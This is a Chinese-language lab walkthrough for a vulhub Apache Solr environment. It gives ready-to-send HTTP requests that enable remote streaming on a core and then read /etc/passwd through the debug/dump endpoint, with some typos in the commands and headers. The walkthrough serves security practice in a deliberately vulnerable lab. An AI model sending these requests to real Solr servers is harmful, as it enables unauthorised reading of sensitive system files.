一、环境准备

搭建环境vulhub，需要提前安装docker环境

docker安装：docker--安装docker-ce-CSDN博客

vulhub地址：https://github.com/vulhub/vulhub

#创建靶场环境
mkdir /opt/vulhub
cd /opt/vulhub
git https://github.com/vulhub/vulhub.git #git拉取失败请用主机下砸zip上传虚拟机或云服务器
cd /opt/vulhub/vulhub-master/solr/CVE-2019-17558
docker-compose up -d

windows安装jdk环境

下载bp抓包工具

 

二、抓包测试

 获取name信息，如果使用的是

http://*.*.*.*:8983/solr/admin/cores?indexInfo=false&wt=json

name属性为demo 

{"responseHeader":{"status":0,"QTime":0},"initFailures":{},"status":{"demo":{"name":"demo","instanceDir":"/var/solr/data/demo","dataDir":"/var/solr/data/demo/data/","config":"solrconfig.xml","schema":"managed-schema","startTime":"2024-01-16T07:46:24.405Z","uptime":165859}}}

打开bp，设置代理，浏览器也要设置，虚拟机设置127.0.0.1，云服务器设置公网IP，端口自定义（默认是8080），bp与浏览器一致即可，另外与本机服务不冲突

判断漏洞是否存在，返回正确说明存在

POST /solr/demo/config HTTP/1.1
Host: *.*.*.*:8983
Content-Length: 92
Connection: close{"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true}
}

 

三、构造特殊请求包获取敏感数据

构造读取/etc/passwd

POST /solr/demo/./debug/dump?param=ContentStreams HTTP/1.1
Host: *.*.*.*:8983
Content-Length: 29
Content-Type: application/x-www-form-urlencoded
Connection: closestream.url=file:///etc/passwd

获取成功